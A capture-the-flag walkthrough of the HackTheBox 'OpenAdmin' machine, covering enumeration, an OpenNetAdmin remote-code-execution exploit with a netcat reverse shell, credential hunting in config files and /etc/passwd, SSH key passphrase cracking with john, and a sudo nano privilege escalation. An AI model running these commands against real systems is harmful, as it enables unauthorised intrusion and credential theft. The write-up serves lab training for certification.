OpenAdmin from HackTheBox
OpenAdmin is classed as Easy in difficulty by Hack the Box however user reporting indicates that the difficulty curve is more aligned around the Medium mark. Overall it is a great challenge as part of TJNulls list of boxes for when preparing for OSCP. The box contains web enumeration but very minor web exploitation. The entry was simply a matter of finding the "in" then discovering the web app name and version. The grunt of the work was with enumeration on the system and knowing where to look for credentials and information. The challenge was definitely in the discovery of information.
❯ sudo nmap -sV 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Through initial enumeration, nmap can see both port 22 and port 80 are open. SSH is typically not a vulnerable service to exploit leaving the latter port to be the destination.
From poking around within the HTTP website, it appears to be a default Apache installation page.
Running feroxbuster does return interesting directories with each entry representing it's own website.
❯ feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171/ -x html
The first target is /music/ and while fumbling around it appears that when you hit login, then it automatically logs in as guest.
The page immediately displays the version. When looking at the browser source; it shows the webapp to be OpenNetAdmin
Knowing both the application and the version means that it is beneficial to google for exploits already known. From this; google shows a possible Remote Code Execution vulnerability using the following exploit:
In order to use the exploit, first setting up the listener
nc -lvnp 4444
Then running the exploit:
chmod +x ./OpenNetAdmin.sh
./OpenNetAdmin.sh $url $lhost $lport
With this we receive the reverse shell and is able to interact directly with the web server as www-data. First we want to stabilise our shell without worrying about accidental issues.
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
While poking around, we find a database_settings file within /opt/ona/www/local/config with the following command and get the first credentials:
find . -name *settings*.php 2>/dev/null
With the found credentials, we can look for where to use them. First we look for usernames and then test against each one. The following searches for users with a /bin/bash shell
cat /etc/passwd |grep sh
Attempting the password with jimmy ends up logged in as him!
As we have the Jimmy credentials, if you recall SSH was also open. So we can move from our netcat shell and log in to SSH. Poking around some more eventually doesn't uncover much so then moving on to looking at listening tcp/udp ports is a good move
With this we find that port 52846 is running on the internal loop. We want to see what content is there and we can use SSH to portforward allowing us to access it.
ssh -L 1081:127.0.0.1:52846 firstname.lastname@example.org
Now we can access the content on our local browser by visiting the following url:
After many attempts at brute forcing with common credentials; there wasn't much information to gather from this so it meant we are lacking in credentials likely still within the web server.
We know that this webpage is being hosted on the loopback address and when we accessed it, it clearly has an index page. This means we need to find the code within the web server. There is another directory called Internal that was within the /var/www folder.
When looking into it, we discover from the index.php code that the information is very similar to what we are seeing on the localhost content. This folder may represent that internal hosted content. Further down the index.php page also includes this interesting part that appears to be a sha512 hash. This is normally a difficult hash to bruteforce as it can take a lot longer to crack. So before starting up John or hashcat, it is a good idea to use some great online resources. Crackstation is a great resource that uses very large rainbow tables that has pre-matched hashes to passwords already. So it is often very beneficial to search there initially before anything else.
The good news is that when using Crackstation rainbow tables, it was able to match the hash within seconds (password blurred):
Now when going back to the internal content, we type the user: Jimmy and his password to receive the following page.
This is a RSA Private Key used with SSH. We can copy this into a file and attempt to use it to login. Copy the content from -(dash) to -(dash) and save it locally.
echo "content" > id_rsa
When attempting to login as any of the remaining users, it was asking for a passphrase. This means that the private key contains a passphrase that we don't have. In order to get this, we can attempt to crack the RSA key. First we need to convert it into a usable hash:
#Convert into a hash
/usr/share/john/ssh2john id_rsa > crackme
Then use John or hashcat to crack the file.
john crackme --wordlist=/usr/share/wordlists/rockyou.txt
After a few seconds, the passphrase was recovered! With this we can try to login to any users remaining that we know about.
Unfortunately it was not possible to login to root so attempting Joanna would be our next bet.
#SSH login with Private Key and Passphrase
ssh -i id_rsa email@example.com
password = $passphrase uncovered
This was a success!
With logging in as Joanna we are able to get our first user flag.
Through general enumeration we find that Joanna can use sudo on a single command without password prompt.
When running the command it ends up launching a Nano file as sudo.
sudo /bin/nano /opt/priv
The first thing here is to have a look if there is information on the program within https://gtfobins.github.io. Having a look at GTFO bins shows how nano can be used for shell escapes:
And with that we are root and able to get the root flag.
The box is one a TJNulls list of OSCP-like boxes and it definitely lives up to it in terms of the information gathering while on target. While the box is classed as an Easy box by Hack The Box; the user-reporting was that it was more of a medium difficulty box. The exploits were great and not particularly difficult to discover however the information gathering was the key focus on this box.